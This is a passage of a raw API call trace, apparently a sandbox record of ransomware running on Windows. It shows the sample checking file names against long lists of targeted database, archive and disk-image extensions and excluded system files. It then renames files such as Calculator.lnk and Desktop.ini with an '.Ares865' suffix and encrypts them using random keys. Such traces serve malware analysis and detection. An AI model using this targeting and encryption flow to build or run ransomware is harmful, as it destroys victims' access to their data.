[0068.175] lstrcmpiW (lpString1="tor.lnk", lpString2="marshal") returned 1 [0068.175] lstrlenW (lpString="mas") returned 3 [0068.175] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0068.175] lstrlenW (lpString="mav") returned 3 [0068.175] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0068.175] lstrlenW (lpString="maw") returned 3 [0068.175] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0068.175] lstrlenW (lpString="mdbhtml") returned 7 [0068.175] lstrcmpiW (lpString1="tor.lnk", lpString2="mdbhtml") returned 1 [0068.175] lstrlenW (lpString="mdn") returned 3 [0068.175] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0068.175] lstrlenW (lpString="mdt") returned 3 [0068.175] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0068.175] lstrlenW (lpString="mfd") returned 3 [0068.175] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0068.175] lstrlenW (lpString="mpd") returned 3 [0068.175] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0068.175] lstrlenW (lpString="mrg") returned 3 [0068.175] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0068.176] lstrlenW (lpString="mud") returned 3 [0068.176] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0068.176] lstrlenW (lpString="mwb") returned 3 [0068.176] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0068.176] lstrlenW (lpString="myd") returned 3 [0068.176] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0068.176] lstrlenW (lpString="ndf") returned 3 [0068.176] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0068.176] lstrlenW (lpString="nnt") returned 3 [0068.176] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0068.176] lstrlenW (lpString="nrmlib") returned 6 [0068.176] lstrcmpiW (lpString1="or.lnk", lpString2="nrmlib") returned 1 [0068.176] lstrlenW (lpString="ns2") returned 3 [0068.176] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0068.176] lstrlenW (lpString="ns3") returned 3 [0068.176] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0068.176] lstrlenW (lpString="ns4") returned 3 [0068.176] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0068.176] lstrlenW (lpString="nsf") returned 3 [0068.176] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0068.176] lstrlenW (lpString="nv") returned 2 [0068.176] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0068.176] lstrlenW (lpString="nv2") returned 3 [0068.176] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0068.176] lstrlenW (lpString="nwdb") returned 4 [0068.176] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0068.176] lstrlenW (lpString="nyf") returned 3 [0068.176] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0068.176] lstrlenW (lpString="odb") returned 3 [0068.176] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0068.176] lstrlenW (lpString="odb") returned 3 [0068.176] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0068.176] lstrlenW (lpString="oqy") returned 3 [0068.176] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0068.176] lstrlenW (lpString="ora") returned 3 [0068.176] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0068.176] lstrlenW (lpString="orx") returned 3 [0068.176] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0068.177] lstrlenW (lpString="owc") returned 3 [0068.177] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0068.177] lstrlenW (lpString="p96") returned 3 [0068.177] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0068.177] lstrlenW (lpString="p97") returned 3 [0068.177] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0068.177] lstrlenW (lpString="pan") returned 3 [0068.177] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0068.177] lstrlenW (lpString="pdb") returned 3 [0068.177] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0068.177] lstrlenW (lpString="pdm") returned 3 [0068.177] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0068.177] lstrlenW (lpString="pnz") returned 3 [0068.177] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0068.177] lstrlenW (lpString="qry") returned 3 [0068.177] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0068.177] lstrlenW (lpString="qvd") returned 3 [0068.177] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0068.177] lstrlenW (lpString="rbf") returned 3 [0068.177] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0068.177] lstrlenW (lpString="rctd") returned 4 [0068.177] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0068.177] lstrlenW (lpString="rod") returned 3 [0068.177] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0068.177] lstrlenW (lpString="rodx") returned 4 [0068.177] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0068.177] lstrlenW (lpString="rpd") returned 3 [0068.177] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0068.177] lstrlenW (lpString="rsd") returned 3 [0068.177] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0068.177] lstrlenW (lpString="sas7bdat") returned 8 [0068.177] lstrcmpiW (lpString1="ator.lnk", lpString2="sas7bdat") returned -1 [0068.177] lstrlenW (lpString="sbf") returned 3 [0068.177] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0068.177] lstrlenW (lpString="scx") returned 3 [0068.177] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0068.177] lstrlenW (lpString="sdb") returned 3 [0068.177] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0068.178] lstrlenW (lpString="sdc") returned 3 [0068.178] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0068.178] lstrlenW (lpString="sdf") returned 3 [0068.178] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0068.178] lstrlenW (lpString="sis") returned 3 [0068.178] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0068.178] lstrlenW (lpString="spq") returned 3 [0068.178] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0068.178] lstrlenW (lpString="te") returned 2 [0068.178] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0068.178] lstrlenW (lpString="teacher") returned 7 [0068.178] lstrcmpiW (lpString1="tor.lnk", lpString2="teacher") returned 1 [0068.178] lstrlenW (lpString="tmd") returned 3 [0068.178] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0068.178] lstrlenW (lpString="tps") returned 3 [0068.178] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0068.178] lstrlenW (lpString="trc") returned 3 [0068.178] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0068.178] lstrlenW (lpString="trc") returned 3 [0068.178] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0068.178] lstrlenW (lpString="trm") returned 3 [0068.178] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0068.178] lstrlenW (lpString="udb") returned 3 [0068.178] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0068.178] lstrlenW (lpString="udl") returned 3 [0068.178] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0068.178] lstrlenW (lpString="usr") returned 3 [0068.178] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0068.178] lstrlenW (lpString="v12") returned 3 [0068.178] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0068.178] lstrlenW (lpString="vis") returned 3 [0068.178] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0068.178] lstrlenW (lpString="vpd") returned 3 [0068.178] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0068.178] lstrlenW (lpString="vvv") returned 3 [0068.178] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0068.178] lstrlenW (lpString="wdb") returned 3 [0068.179] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0068.179] lstrlenW (lpString="wmdb") returned 4 [0068.179] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0068.179] lstrlenW (lpString="wrk") returned 3 [0068.179] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0068.179] lstrlenW (lpString="xdb") returned 3 [0068.179] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0068.179] lstrlenW (lpString="xld") returned 3 [0068.179] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0068.179] lstrlenW (lpString="xmlff") returned 5 [0068.179] lstrcmpiW (lpString1="r.lnk", lpString2="xmlff") returned -1 [0068.179] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Calculator.lnk.Ares865") returned 73 [0068.179] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Calculator.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\calculator.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Calculator.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\calculator.lnk.ares865"), dwFlags=0x1) returned 1 [0068.180] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Calculator.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\calculator.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0068.180] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1230) returned 1 [0068.180] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0068.184] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0068.184] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0068.185] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0068.185] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.185] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.185] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x120 [0068.186] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x190000 [0068.186] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0068.186] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.186] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.187] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0068.187] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0068.187] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0068.187] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0068.187] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0068.187] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0068.187] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0068.187] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0068.187] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0068.187] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0068.187] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0068.187] CloseHandle (hObject=0x120) returned 1 [0068.187] CloseHandle (hObject=0x154) returned 1 [0068.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0068.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0068.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0068.194] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec08153b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xec08153b, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x8246bb80, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x73e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0068.194] lstrcmpiW (lpString1="Desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0068.194] lstrcmpiW (lpString1="Desktop.ini", lpString2="aoldtz.exe") returned 1 [0068.194] lstrcmpiW (lpString1="Desktop.ini", lpString2=".") returned 1 [0068.195] lstrcmpiW (lpString1="Desktop.ini", lpString2="..") returned 1 [0068.195] lstrcmpiW (lpString1="Desktop.ini", lpString2="windows") returned -1 [0068.195] lstrcmpiW (lpString1="Desktop.ini", lpString2="bootmgr") returned 1 [0068.195] lstrcmpiW (lpString1="Desktop.ini", lpString2="temp") returned -1 [0068.195] lstrcmpiW (lpString1="Desktop.ini", lpString2="pagefile.sys") returned -1 [0068.195] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot") returned 1 [0068.195] lstrcmpiW (lpString1="Desktop.ini", lpString2="ids.txt") returned -1 [0068.195] lstrcmpiW (lpString1="Desktop.ini", lpString2="ntuser.dat") returned -1 [0068.195] lstrcmpiW (lpString1="Desktop.ini", lpString2="perflogs") returned -1 [0068.195] lstrcmpiW (lpString1="Desktop.ini", lpString2="MSBuild") returned -1 [0068.195] lstrlenW (lpString="Desktop.ini") returned 11 [0068.195] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Calculator.lnk") returned 65 [0068.195] lstrcpyW (in: lpString1=0x2cce466, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0068.195] lstrlenW (lpString="Desktop.ini") returned 11 [0068.195] lstrlenW (lpString="Ares865") returned 7 [0068.195] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0068.195] lstrlenW (lpString=".dll") returned 4 [0068.195] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0068.195] lstrlenW (lpString=".lnk") returned 4 [0068.195] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0068.195] lstrlenW (lpString=".ini") returned 4 [0068.195] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0068.195] lstrlenW (lpString=".sys") returned 4 [0068.195] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0068.195] lstrlenW (lpString="Desktop.ini") returned 11 [0068.195] lstrlenW (lpString="bak") returned 3 [0068.195] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0068.195] lstrlenW (lpString="ba_") returned 3 [0068.195] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0068.195] lstrlenW (lpString="dbb") returned 3 [0068.195] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0068.195] lstrlenW (lpString="vmdk") returned 4 [0068.195] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0068.195] lstrlenW (lpString="rar") returned 3 [0068.195] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0068.195] lstrlenW (lpString="zip") returned 3 [0068.195] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0068.195] lstrlenW (lpString="tgz") returned 3 [0068.196] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0068.196] lstrlenW (lpString="vbox") returned 4 [0068.196] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0068.196] lstrlenW (lpString="vdi") returned 3 [0068.196] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0068.196] lstrlenW (lpString="vhd") returned 3 [0068.196] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0068.196] lstrlenW (lpString="vhdx") returned 4 [0068.196] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0068.196] lstrlenW (lpString="avhd") returned 4 [0068.196] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0068.196] lstrlenW (lpString="db") returned 2 [0068.196] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0068.196] lstrlenW (lpString="db2") returned 3 [0068.196] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0068.196] lstrlenW (lpString="db3") returned 3 [0068.196] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0068.196] lstrlenW (lpString="dbf") returned 3 [0068.196] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0068.196] lstrlenW (lpString="mdf") returned 3 [0068.196] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0068.196] lstrlenW (lpString="mdb") returned 3 [0068.196] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0068.196] lstrlenW (lpString="sql") returned 3 [0068.196] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0068.196] lstrlenW (lpString="sqlite") returned 6 [0068.196] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0068.196] lstrlenW (lpString="sqlite3") returned 7 [0068.196] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0068.196] lstrlenW (lpString="sqlitedb") returned 8 [0068.196] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0068.196] lstrlenW (lpString="xml") returned 3 [0068.196] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0068.196] lstrlenW (lpString="$er") returned 3 [0068.196] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0068.196] lstrlenW (lpString="4dd") returned 3 [0068.196] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0068.196] lstrlenW (lpString="4dl") returned 3 [0068.196] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0068.196] lstrlenW (lpString="^^^") returned 3 [0068.197] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0068.197] lstrlenW (lpString="abs") returned 3 [0068.197] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0068.197] lstrlenW (lpString="abx") returned 3 [0068.197] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0068.197] lstrlenW (lpString="accdb") returned 5 [0068.197] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0068.197] lstrlenW (lpString="accdc") returned 5 [0068.197] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0068.197] lstrlenW (lpString="accde") returned 5 [0068.197] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0068.197] lstrlenW (lpString="accdr") returned 5 [0068.197] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0068.197] lstrlenW (lpString="accdt") returned 5 [0068.197] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0068.197] lstrlenW (lpString="accdw") returned 5 [0068.197] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0068.197] lstrlenW (lpString="accft") returned 5 [0068.197] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0068.197] lstrlenW (lpString="adb") returned 3 [0068.197] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0068.197] lstrlenW (lpString="adb") returned 3 [0068.197] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0068.197] lstrlenW (lpString="ade") returned 3 [0068.197] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0068.197] lstrlenW (lpString="adf") returned 3 [0068.197] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0068.197] lstrlenW (lpString="adn") returned 3 [0068.197] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0068.197] lstrlenW (lpString="adp") returned 3 [0068.197] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0068.197] lstrlenW (lpString="alf") returned 3 [0068.197] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0068.197] lstrlenW (lpString="ask") returned 3 [0068.197] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0068.198] lstrlenW (lpString="btr") returned 3 [0068.198] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0068.198] lstrlenW (lpString="cat") returned 3 [0068.198] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0068.198] lstrlenW (lpString="cdb") returned 3 [0068.198] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0068.198] lstrlenW (lpString="ckp") returned 3 [0068.198] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0068.198] lstrlenW (lpString="cma") returned 3 [0068.198] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0068.198] lstrlenW (lpString="cpd") returned 3 [0068.198] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0068.198] lstrlenW (lpString="dacpac") returned 6 [0068.198] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0068.198] lstrlenW (lpString="dad") returned 3 [0068.198] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0068.198] lstrlenW (lpString="dadiagrams") returned 10 [0068.198] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0068.198] lstrlenW (lpString="daschema") returned 8 [0068.198] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0068.198] lstrlenW (lpString="db-journal") returned 10 [0068.198] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0068.198] lstrlenW (lpString="db-shm") returned 6 [0068.198] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0068.198] lstrlenW (lpString="db-wal") returned 6 [0068.198] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0068.198] lstrlenW (lpString="dbc") returned 3 [0068.198] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0068.198] lstrlenW (lpString="dbs") returned 3 [0068.198] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0068.198] lstrlenW (lpString="dbt") returned 3 [0068.198] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0068.198] lstrlenW (lpString="dbv") returned 3 [0068.198] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0068.198] lstrlenW (lpString="dbx") returned 3 [0068.198] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0068.198] lstrlenW (lpString="dcb") returned 3 [0068.198] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0068.199] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Desktop.ini.Ares865") returned 70 [0068.199] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\desktop.ini"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0068.201] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.201] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1854) returned 1 [0068.201] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0068.201] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0068.201] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0068.201] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0068.202] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.202] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.202] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa40, lpName=0x0) returned 0x12c [0068.202] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa40) returned 0x190000 [0068.202] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0068.203] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.203] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0068.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0068.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0068.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0068.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0068.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0068.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0068.204] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0068.204] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0068.204] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0068.204] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0068.204] CloseHandle (hObject=0x12c) returned 1 [0068.204] CloseHandle (hObject=0x15c) returned 1 [0068.205] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0068.205] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0068.205] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0068.205] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27fbfe08, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x27fbfe08, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28032229, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="displayswitch.lnk", cAlternateFileName="DISPLA~1.LNK")) returned 1 [0068.205] lstrcmpiW (lpString1="displayswitch.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 